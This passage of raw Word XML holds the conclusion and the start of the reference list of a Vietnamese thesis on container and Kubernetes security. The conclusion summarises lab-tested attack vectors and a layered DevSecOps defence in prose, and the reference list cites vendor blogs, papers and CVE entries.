        <w:t xml:space="preserve"> đã hoàn thành toàn vẹn các mục tiêu đặt ra, mang lại một nghiên cứu có giá trị thực tiễn cao cho lĩnh vực an toàn bảo mật hệ thống phân tán. Đề án đã xây dựng thành công hệ thống cơ sở lý luận vững chắc về kiến trúc container hóa, làm rõ bản chất cô lập của các cơ chế Namespaces và cgroups thuộc nhân Linux. Thông qua quá trình phân tích lý thuyết và thiết lập môi trường phòng thí nghiệm thực nghiệm, đề án đã tái hiện và làm sáng tỏ cơ chế hoạt động của các véc-tơ tấn công nguy hiểm có tính thời sự hiện nay bao gồm tấn công thoát chuồng, lạm dụng cấu hình sai đặc quyền, đánh cắp token điều phối và nghe lén mạng nội bộ microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570ABD4" w14:textId="2860F67C" w:rsidR="001B7593" w:rsidRPr="00010541" w:rsidRDefault="00026BE1" w:rsidP="00010541">
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve">Từ các kết quả thực nghiệm đó, </w:t>
      </w:r>
      <w:r w:rsidR="00D81B1F" w:rsidRPr="00D81B1F">
        <w:t>học viê</w:t>
      </w:r>
      <w:r w:rsidR="00D81B1F" w:rsidRPr="00452426">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve"> đã đề xuất và chứng minh tính hiệu quả của một mô hình giải pháp phòng thủ đa lớp toàn diện theo chu trình DevSecOps. Giải pháp đã kết hợp hài hòa giữa việc rà quét kiểm soát tĩnh chuỗi cung ứng bằng Trivy, Harbor cho đến việc thiết lập các cơ chế phòng thủ runtime chủ động bằng Seccomp, Falco và cô lập mạng bằng Network Policy. Các biện pháp này hoàn toàn đảm bảo tính hoạt động hiệu quả, bảo vệ hệ thống một cách tối </w:t>
      </w:r>
      <w:r w:rsidR="006C7148" w:rsidRPr="006C7148">
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="006C7148" w:rsidRPr="006522A9">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve"> và gần như trong suốt, không gây ảnh hưởng đến hiệu năng vận hành thực tế của môi trường container.</w:t>
      </w:r>
      <w:r w:rsidR="001B7593">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373D164" w14:textId="581C02FB" w:rsidR="00044C71" w:rsidRPr="00727AA1" w:rsidRDefault="00044C71" w:rsidP="008B11B6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc235976395"/>
      <w:r w:rsidRPr="00727AA1">
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC CÁC TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
        </w:rPr>
        <w:id w:val="573623776"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:caps/>
            </w:rPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:p w14:paraId="5607F22B" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="00044C71" w:rsidP="00026BE1">
              <w:pPr>
                <w:ind w:firstLine="0"/>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                  <w:noProof/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
                  <w:caps/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
                  <w:caps/>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76"/>
                <w:gridCol w:w="7714"/>
              </w:tblGrid>
              <w:tr w:rsidR="0056158A" w14:paraId="77A95E88" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="48B2D47F" w14:textId="3A5E7DAC" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0F8EE30F" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>E. Stephan, “Aqua Blog,” Aqua Inc, 17 June 2024. [Trực tuyến]. Available: https://www.aquasec.com/blog/understanding-the-importance-of-runtime-security-in-cloud-native-environments/. [Đã truy cập 17 June 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="7C4A9626" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="379C8E6E" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0C10D1BA" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>S. Roger, “dhl freight connections,” DLH, 14 July 2022. [Trực tuyến]. Available: https://dhl-freight-connections.com/en/logistics-dictionary/container/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="5E826785" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="546F17E1" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="44F3F81E" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>M. Miller, “Use containers to Build, Share and Run your applications,” Docker Inc, 15 May 2024. [Trực tuyến]. Available: https://www.docker.com/resources/what-container/. [Đã truy cập 15 May 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="48E98E5A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4BCA443D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="29A8B9B8" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>T. C. N. Experts, “A Brief History of Containers: From the 1970s Till Now,” Aqua Inc, 10 September 2025. [Trực tuyến]. Available: https://www.aquasec.com/blog/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="6D6247B4" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4306E99D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:lang w:val="en-US"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B3CFA7B" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>K. Inc, "medium.com," 13 Mar 2019. [Online]. Available: https://medium.com/@knoldus/unionfs-a-file-system-of-a-container-2136cd11a779.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="63930E36" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6E65AA84" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4D4B79F8" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Nimmagadda, “Linux Namespaces and cgroups as OS Primitives for Lightweight,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="242CC9DB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1B9515C5" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4170EC7A" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>R. Rosen, “Namespaces and Cgroups – the basis of Linux Containers,” [Trực tuyến]. Available: https://www.andrew.cmu.edu/course/14-712-s20/applications/ln/Namespaces_Cgroups_Conatiners.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="229FB374" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="65489F9D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2E2027B2" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">H. S. S. J. Motahare Mounesan, “Exploring the Threat of Software Supply Chain Attacks on Containerized Applications,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2023. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="750BA064" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="63B4302C" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="12A8E952" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. a. I. S. A. (CISA), “APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations (SolarWinds),” CISA, 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="51C791BB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5A14FF9B" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="729ED112" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. O. Report, “Bash Uploader Security Incident,” Codecov Security Update, 2021.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="0CBB348C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="702E85E0" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="43D2E580" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2019-5736: runc Container Escape Vulnerability,” NIST, 2019.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="5E424552" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="04DB988F" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7778542D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2020-15257: containerd-shim API Exposure Vulnerability,” NIST, 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="61B547DB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2F6A481C" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1B5D348A" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>M. Kellermann, “The Dirty Pipe Vulnerability (CVE-2022-0847),” CM4all Report, 2022.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="6F9EDDBB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="02927F78" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4930C914" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2018-1002105: Kubernetes API Server Privilege Escalation,” NIST, 2018.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="2401158D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3CAD3B21" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CC245EA" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">P. A. N. Research, “Unit 42,” trong </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Hildegard: New Malware Campaign Targetting Kubernetes via Kubelet API</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="7A0E2462" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="58A47925" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="38C85FC0" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. V. D. (NVD), “CVE-2021-25741: Kubernetes Ingress Controller Information Disclosure Vulnerability,” NIST, 2021.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="291C2529" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
